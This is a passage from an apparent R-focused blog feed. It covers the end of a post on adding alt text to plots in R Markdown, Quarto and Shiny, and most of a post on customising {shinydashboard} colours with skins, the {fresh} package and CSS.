&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;#| fig.alt: &amp;#34;A bar chart titled Lemurs at Duke Lemur Center. On the x-axis three species of lemurs are shown including the Crowned lemur, Gray mouse lemur, and Ring-tailed lemur. On the y-axis the count of the number of each species is shown. The number of lemurs ranges from just under 2500 for Crowned lemurs, to almost 12500 for Gray mouse lemurs. The number of Crowned lemurs is significantly lower than the other two species shown.&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Adding alt text directly into the code chunk options has always felt slightly clunky, and so what you can do instead is store your alt text in a variable and reference it in the code block option. Alternatively, you can make good use of the &lt;code&gt;get_alt_text()&lt;/code&gt; function in {ggplot2} in your R Markdown chunk options:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```{r, fig.alt=ggplot2::get_alt_text(g)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In Quarto, you need to be a bit more explicit about the fact you&amp;rsquo;re calling a function, but it&amp;rsquo;s still pretty straightforward:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```{r}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;#| fig-alt: !expr ggplot2::get_alt_text(g)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;```
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you inspect the HTML of your R Markdown / Quarto output (by right-clicking and selecting &lt;em&gt;Inspect&lt;/em&gt;, or using the Ctrl+Shift+I keyboard shortcut), you can see the alt text has been added to the image:&lt;/p&gt;
&lt;img src="inspect.png" style="width: 100%; display: block; margin-left: auto; margin-right: auto" alt="Screenshot of generated html code showing the alt text previously described added to the image tag with alt" /&gt;
&lt;p&gt;If you&amp;rsquo;re creating an output format that doesn&amp;rsquo;t allow you to add alt text, such as PDF, you should still add a description of the image somewhere. You could pass in &lt;code&gt;ggplot2::get_alt_text(g)&lt;/code&gt; to the &lt;code&gt;fig.cap&lt;/code&gt; chunk option as an alternative.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re adding an image outside of a code chunk, you can add alt text to images in Quarto using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;![](lemur.png){fig-alt=&amp;#34;A drawing of a lemur.&amp;#34;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and replacing &lt;code&gt;fig-alt&lt;/code&gt; with &lt;code&gt;alt&lt;/code&gt; works for R Markdown.&lt;/p&gt;
&lt;h4 id="shiny"&gt;Shiny&lt;/h4&gt;
&lt;p&gt;Finally, on to adding alt text in Shiny apps! Since Shiny makes it easy to build web applications straight from R, it&amp;rsquo;s important that you know how to add alt text to Shiny apps from R. If you haven&amp;rsquo;t made your plots with {ggplot2}, haven&amp;rsquo;t added your alt text to the &lt;code&gt;alt&lt;/code&gt; argument in &lt;code&gt;labs()&lt;/code&gt;, or need your alt text to update, read on!&lt;/p&gt;
&lt;p&gt;Most plots in Shiny apps are generated within a &lt;code&gt;renderPlot()&lt;/code&gt; call, with the first argument being the code that generates the plot. &lt;code&gt;renderPlot()&lt;/code&gt; also has an &lt;code&gt;alt&lt;/code&gt; argument (added in version 1.5.1) where you can pass in a character string of alt text for your plot:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code to generate plot goes here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;alt text goes here&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, most plots in Shiny apps have some sort of reactivity associated with them - when a user changes an input value, the plot updates. This means that the alt text should update as well. Luckily, you can pass in a &lt;code&gt;reactive()&lt;/code&gt; to the &lt;code&gt;alt&lt;/code&gt; argument in &lt;code&gt;renderPlot()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderPlot&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code to generate plot goes here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# code to add alt text goes here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This means you can pass in different strings of alt text depending on which input values a user has selected. Depending on what the plot contains and what the user inputs do, you could construct the alt text based on the inputs. Even better, create a look-up table that returns human-written alt text based on a combination of input variables.&lt;/p&gt;
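&lt;p&gt;As a minimal sketch of the look-up table idea, the code below stores one human-written description per combination of inputs and falls back to a generic description when no entry exists. The names &lt;code&gt;alt_lookup&lt;/code&gt; and &lt;code&gt;lookup_alt()&lt;/code&gt;, the input names, and the placeholder descriptions are all assumptions made for illustration; they are not part of {shiny}.&lt;/p&gt;

```r
# Hypothetical look-up table: names are "species|measure" keys, values are
# placeholder descriptions that you would replace with your own alt text.
alt_lookup = c(
  "Crowned lemur|count" = "Placeholder: bar chart of counts for Crowned lemurs.",
  "Crowned lemur|weight" = "Placeholder: bar chart of weights for Crowned lemurs.",
  "Ring-tailed lemur|count" = "Placeholder: bar chart of counts for Ring-tailed lemurs.",
  "Ring-tailed lemur|weight" = "Placeholder: bar chart of weights for Ring-tailed lemurs."
)

# Return the human-written alt text for one combination of inputs.
# If the combination is missing, build a generic description instead,
# so the plot is never left without any alt text.
lookup_alt = function(species, measure, table = alt_lookup) {
  key = paste(species, measure, sep = "|")
  if (key %in% names(table)) {
    table[[key]]
  } else {
    paste("A plot of", measure, "for", species)
  }
}

# Inside a Shiny server function, assuming inputs called species and measure:
# output$plot = renderPlot(
#   {
#     # code to generate plot goes here
#   },
#   alt = reactive(lookup_alt(input$species, input$measure))
# )
```

&lt;p&gt;Keeping the descriptions in one table makes them easy to review and edit alongside the app, and the fallback acts as a safety net rather than a replacement for human-written text.&lt;/p&gt;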
&lt;p&gt;If you want to read more about accessibility in Shiny then check out our previous &lt;a href="https://www.jumpingrivers.com/blog/accessible-shiny-standards-wcag/" rel="external"&gt;blog post&lt;/a&gt; on the topic.&lt;/p&gt;
&lt;p&gt;I hope this blog post has convinced you that writing alt text is worthwhile, and not too tricky to add to the documents and apps you build with R!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>How to customise the style of your {shinydashboard} Shiny app</title><link>https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/</link><pubDate>Thu, 16 Mar 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Using {shinydashboard} is great for creating dashboard prototypes with a
header-sidebar-body layout. You can quickly mock up a professional
looking dashboard containing a variety of outputs, including plots and
tables.&lt;/p&gt;
&lt;p&gt;However, after a while, you’ll probably have had enough of the “50
shades of blue” default theme. Or, you might have been asked to
follow company branding guidelines, so you need to replace the default
colours with custom ones.&lt;/p&gt;
&lt;p&gt;This blog will take you through three different options when customising
a {shinydashboard}. First, we’ll look at using the colour and theme
options available in the package. Then, we’ll show you how to use the
{fresh} package to be able to use completely custom colour palettes.
Finally, we will look at using custom CSS to give you even more control
of the overall style of your dashboard.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-r-shiny-customising-shinydashboard"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-shinydashboard-package"&gt;The {shinydashboard} package&lt;/h3&gt;
&lt;p&gt;Before we get started with styling our dashboard, let’s do a quick
refresher of what {shinydashboard} is and how to use it.
{shinydashboard} is a package which provides a simple dashboard layout
consisting of a header, sidebar, and body. The code below creates an
empty dashboard, using the main layout functions from {shinydashboard}:
&lt;code&gt;dashboardHeader()&lt;/code&gt;, &lt;code&gt;dashboardSidebar()&lt;/code&gt;, and &lt;code&gt;dashboardBody()&lt;/code&gt;, all
wrapped inside of &lt;code&gt;dashboardPage()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shinydashboard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardHeader&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardSidebar&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="An empty shiny dashboard." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/shinydashboard.png" width="1310"&gt;&lt;/p&gt;
&lt;p&gt;The package is really good at this basic type of layout, and includes
ways to enhance it — for example by adding tabs to your app using the
&lt;code&gt;menuItem()&lt;/code&gt; function, as well as the addition of the &lt;code&gt;box()&lt;/code&gt;,
&lt;code&gt;infoBox()&lt;/code&gt;, and &lt;code&gt;valueBox()&lt;/code&gt; functions, offering ways of storing
outputs in different kinds of containers.&lt;/p&gt;
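&lt;p&gt;To make those functions concrete, here is a small sketch of a two-tab dashboard that uses &lt;code&gt;menuItem()&lt;/code&gt;, &lt;code&gt;valueBox()&lt;/code&gt;, &lt;code&gt;infoBox()&lt;/code&gt; and &lt;code&gt;box()&lt;/code&gt;. The tab names, titles and values are made up for illustration and are not taken from the example app used later in this post.&lt;/p&gt;

```r
library("shiny")
library("shinydashboard")

# Illustrative only: tab names, titles and values are invented for this sketch
ui = dashboardPage(
  dashboardHeader(title = "Example"),
  dashboardSidebar(
    # Each menuItem() links to the tabItem() with the same tabName
    sidebarMenu(
      menuItem("Overview", tabName = "overview"),
      menuItem("Details", tabName = "details")
    )
  ),
  dashboardBody(
    tabItems(
      tabItem(
        tabName = "overview",
        # Two small containers for headline figures
        fluidRow(
          valueBox(value = 42, subtitle = "A headline number", width = 4),
          infoBox(title = "Status", value = "OK", width = 4)
        ),
        # A general-purpose container holding a plot output
        fluidRow(
          box(title = "A plot", plotOutput("plot"), width = 12)
        )
      ),
      tabItem(
        tabName = "details",
        box(title = "More detail", "Content goes here")
      )
    )
  )
)

server = function(input, output, session) {
  # Built-in cars dataset, used purely as placeholder data
  output$plot = renderPlot(plot(cars))
}

# Uncomment to launch the app interactively
# shinyApp(ui, server)
```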
&lt;p&gt;Sticking to quite a rigid layout is what makes {shinydashboard} so
great - you don’t have to fiddle around with adjusting the width and
height of divs, deciding if you want a sidebar and which side the
sidebar should be on etc. Instead, you can just use the default layout
which is enough for most dashboards.&lt;/p&gt;
&lt;p&gt;However, this rigidity is also the main weakness of {shinydashboard}. If
you want to move beyond the basic layout, it may require hacky solutions
and can sometimes be downright impossible.&lt;/p&gt;
&lt;p&gt;Despite this, it &lt;em&gt;is&lt;/em&gt; possible to customise {shinydashboard} using
built-in functions and arguments. Let’s see how, using an example
dashboard which displays and compares some summary statistics for rental
properties in the Bay Area of California, US. All code used in this blog
post can be found &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/" rel="external"&gt;on our
GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="using-built-in-colours-and-skins"&gt;Using built-in colours and skins&lt;/h3&gt;
&lt;p&gt;Our example app currently uses the {shinydashboard} default colours. The
only styling I have done is set the fill colour of my bar chart to match
the colour of the value boxes.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Example app without styling. Dashboard of rental property prices with\ngrey and light blue colouring." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/no_style.png" width="1818"&gt;&lt;/p&gt;
&lt;p&gt;The first thing we can customise is the dashboard “skin”, which is the
colour of the dashboard header at the top of the app. The &lt;code&gt;skin&lt;/code&gt;
argument in &lt;code&gt;dashboardPage()&lt;/code&gt; can be one of “blue” (the default),
“black”, “purple”, “green”, “red”, or “yellow”. We will set the skin to
be “purple”:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; skin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which gives us&lt;/p&gt;
&lt;p&gt;&lt;img alt="Colouring dashboard header with skin argument. Text says “Bay Area\nRent Prices” on a purple background." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/purple_skin.png" width="797"&gt;&lt;/p&gt;
&lt;p&gt;The other main thing we might want to change the colour of is the value
boxes. There is a &lt;code&gt;color&lt;/code&gt; argument in the &lt;code&gt;valueBox()&lt;/code&gt; function, which
has slightly more colour choices than for the skin (15 instead of 6).
Luckily, there is a purple in the list of valid colours. For all 6 of
the value boxes in the app, we will need to add &lt;code&gt;color = &amp;quot;purple&amp;quot;&lt;/code&gt; as an
argument:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;valueBox&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;purple&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which gives us:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Using the built-in colours and skins in {shinydashboard}, the\ncolouring is now purple and grey." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/built_in.png" width="1827"&gt;&lt;/p&gt;
&lt;h3 id="using-the-fresh-package"&gt;Using the {fresh} package&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://github.com/dreamRs/fresh" rel="external"&gt;{fresh}&lt;/a&gt; package is an add-on
package which helps you style your {shiny} apps, including apps built
with {shinydashboard}.&lt;/p&gt;
&lt;p&gt;{shinydashboard} is built using
&lt;a href="https://github.com/ColorlibHQ/AdminLTE" rel="external"&gt;AdminLTE&lt;/a&gt;, an open source
dashboard and control panel theme built on top of Bootstrap. Therefore,
functions in {fresh} used to customise {shinydashboard} themes follow
the pattern &lt;code&gt;adminlte_*&lt;/code&gt;. We will use the &lt;code&gt;adminlte_color()&lt;/code&gt; function
to customise our default colours.&lt;/p&gt;
&lt;p&gt;At the top of our app, we need to create a new theme &lt;code&gt;my_theme&lt;/code&gt; using the
&lt;code&gt;create_theme()&lt;/code&gt; function. In our theme, we are going to change the
default AdminLTE colour called “light-blue” to use our company colour
instead:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_theme &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;adminlte_color&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; light_blue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then need to tell {shinydashboard} to use this theme, by placing a
call to &lt;code&gt;use_theme()&lt;/code&gt; in the dashboard body.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dashboardBody&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_theme&lt;/span&gt;(my_theme),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, if we change our value boxes to have &lt;code&gt;color = 'light-blue'&lt;/code&gt;, and
remove any &lt;code&gt;skin&lt;/code&gt; argument in &lt;code&gt;dashboardPage&lt;/code&gt;, we end up with this:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Using the {fresh} package to style {shinydashboard}. The same\nscreenshot of prices but now with a teal background on information boxes\nand title." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/r-shiny-customising-shinydashboard/fresh.png" width="1832"&gt;&lt;/p&gt;
&lt;p&gt;Being able to use any custom colour is definitely a step up from
relying on the built-in colour choices of {shinydashboard}. However,
let’s take it one step further and fully customise the look of our
{shinydashboard} using CSS.&lt;/p&gt;
&lt;h3 id="using-css"&gt;Using CSS&lt;/h3&gt;
&lt;p&gt;CSS (Cascading Style Sheets) is the language used to style HTML elements
on any webpage. Normally when you build Shiny apps you don’t have to
worry about CSS, which is one of the reasons &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;why Shiny is so easy to
get started
with&lt;/a&gt;.
But at some point you’re going to want more control of how your Shiny
app looks, and then it’s probably time to learn some CSS.&lt;/p&gt;
&lt;p&gt;The main way of including CSS in your Shiny app is by creating a CSS
file (a file with the &lt;code&gt;.css&lt;/code&gt; extension) and placing it in a folder
called &lt;code&gt;www/&lt;/code&gt; in the same folder where your Shiny app lives. We will
call this file &lt;code&gt;styles.css&lt;/code&gt; by convention.&lt;/p&gt;
&lt;p&gt;We are going to use this CSS file to modify two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The font of the app: We want to use a custom font &lt;code&gt;Prompt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The colour of the input slider bar: We want it to match the colour
of the rest of the app&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once we have identified the elements and the associated properties we
want to modify, our CSS file ends up looking like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#7ee787"&gt;url&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;https://fonts.googleapis.com/css2?family=Prompt&amp;amp;display=swap&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;irs--shiny&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;irs-bar&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;irs--shiny&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;irs-single&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;border&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#4898a8&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;background&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;#4898a8&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;body&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#7ee787"&gt;h2&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;,&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;main-header&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;logo&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-family&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Prompt&amp;#39;&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;sans-serif&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line imports our custom font called &lt;code&gt;Prompt&lt;/code&gt; from &lt;a href="https://fonts.google.com/" rel="external"&gt;Google
Fonts&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The next four lines select the elements of the slider we want to change,
and set the border colour as well as background colour to be our company
colour (&lt;code&gt;#4898a8&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The last three lines select the body text, our H2 heading, as well as the
header text in the top left corner and set the font to be our custom
font.&lt;/p&gt;
&lt;p&gt;Finally, for a {shinydashboard}, you will need to reference the CSS file
in the dashboard body (similar to where we called &lt;code&gt;use_theme()&lt;/code&gt; in the
{fresh} example). With a stylesheet called “styles.css”, it would look
like this:&lt;/p&gt;
